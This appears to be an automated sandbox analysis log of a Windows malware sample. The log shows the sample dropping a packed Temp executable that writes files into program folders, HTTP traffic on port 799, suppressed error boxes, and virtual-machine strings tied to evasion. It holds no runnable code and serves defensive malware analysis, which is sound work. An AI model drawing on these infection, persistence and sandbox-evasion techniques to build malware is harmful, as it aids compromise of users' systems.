                        Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exeSection loaded: ntvdm64.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exeSection loaded: textshaping.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exeSection loaded: textinputframework.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exeSection loaded: coreuicomponents.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exeSection loaded: coremessaging.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exeSection loaded: ntvdm64.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exeSection loaded: ntvdm64.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exeSection loaded: ntvdm64.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exeSection loaded: ntvdm64.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exeAutomated click: OK
                        Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exeAutomated click: OK
                        Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exeAutomated click: OK
                        Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exeAutomated click: OK
                        Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exeAutomated click: OK
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeStatic file information: File size 1803264 > 1048576
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x112400
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                        Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.6.dr
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                        Data Obfuscation

                        barindex
                        Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exeUnpacked PE file: 6.2.MDSxhU.exe.ad0000.0.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;
                        Source: initial sampleStatic PE information: section where entry point is pointing to: =Jcu
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeStatic PE information: section name: .ottwaed
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeStatic PE information: section name: .ottwaed
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeStatic PE information: section name: =Jcu
                        Source: MDSxhU.exe.4.drStatic PE information: section name: .aspack
                        Source: MDSxhU.exe.4.drStatic PE information: section name: .adata
                        Source: SciTE.exe.6.drStatic PE information: section name: u
                        Source: Uninstall.exe.6.drStatic PE information: section name: EpNuZ
                        Source: MyProg.exe.6.drStatic PE information: section name: PELIB
                        Source: MyProg.exe.6.drStatic PE information: section name: Y|uR
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeCode function: 4_2_00C1DEDB push ecx; ret 4_2_00C1DEEE
                        Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exeCode function: 6_2_00AD1638 push dword ptr [00AD3084h]; ret 6_2_00AD170E
                        Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exeCode function: 6_2_00AD600A push ebp; ret 6_2_00AD600D
                        Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exeCode function: 6_2_00AD2D9B push ecx; ret 6_2_00AD2DAB
                        Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exeCode function: 6_2_00AD6014 push 00AD14E1h; ret 6_2_00AD6425
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeStatic PE information: section name: =Jcu entropy: 6.934615013255218
                        Source: MDSxhU.exe.4.drStatic PE information: section name: .text entropy: 7.81169422100848
                        Source: SciTE.exe.6.drStatic PE information: section name: u entropy: 6.935031443139661
                        Source: Uninstall.exe.6.drStatic PE information: section name: EpNuZ entropy: 6.934849796226582
                        Source: MyProg.exe.6.drStatic PE information: section name: Y|uR entropy: 6.934121705107527

                        Persistence and Installation Behavior

                        barindex
                        Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exeSystem file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exeFile created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exeFile created: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeFile created: C:\Users\user\AppData\Local\Temp\MDSxhU.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exeFile created: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to dropped file

                        Hooking and other Techniques for Hiding and Protection

                        barindex
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 799
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 799
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 799
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 799
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 799
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exeDropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_6-1074
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeAPI coverage: 5.5 %
                        Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exeCode function: 6_2_00AD1718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 00AD1754h6_2_00AD1718
                        Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exeCode function: 6_2_00AD29E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,6_2_00AD29E2
                        Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exeCode function: 6_2_00AD2B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,6_2_00AD2B8C
                        Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\Jump to behavior
                        Source: Amcache.hve.6.drBinary or memory string: VMware
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 00000004.00000002.1728506028.00000000010EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(#
                        Source: Amcache.hve.6.drBinary or memory string: VMware Virtual USB Mouse
                        Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin
                        Source: Amcache.hve.6.drBinary or memory string: VMware, Inc.
                        Source: Amcache.hve.6.drBinary or memory string: VMware20,1hbin@
                        Source: Amcache.hve.6.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                        Source: Amcache.hve.6.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                        Source: Amcache.hve.6.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 00000004.00000003.1386062037.0000000001138000.00000004.00000020.00020000.00000000.sdmp, 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 00000004.00000002.1728506028.0000000001131000.00000004.00000020.00020000.00000000.sdmp, MDSxhU.exe, 00000006.00000003.1361370867.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, MDSxhU.exe, 00000006.00000002.1753575155.000000000138E000.00000004.00000020.00020000.00000000.sdmp, MDSxhU.exe, 00000006.00000003.1487485666.00000000013C4000.00000004.00000020.00020000.00000000.sdmp, MDSxhU.exe, 00000006.00000003.1361518674.00000000013AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                        Source: Amcache.hve.6.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                        Source: Amcache.hve.6.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                        Source: Amcache.hve.6.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                        Source: Amcache.hve.6.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                        Source: Amcache.hve.6.drBinary or memory string: vmci.sys
                        Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin`
                        Source: Amcache.hve.6.drBinary or memory string: \driver\vmci,\driver\pci
                        Source: Amcache.hve.6.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                        Source: Amcache.hve.6.drBinary or memory string: VMware20,1
                        Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Generation Counter
                        Source: Amcache.hve.6.drBinary or memory string: NECVMWar VMware SATA CD00
                        Source: Amcache.hve.6.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                        Source: Amcache.hve.6.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
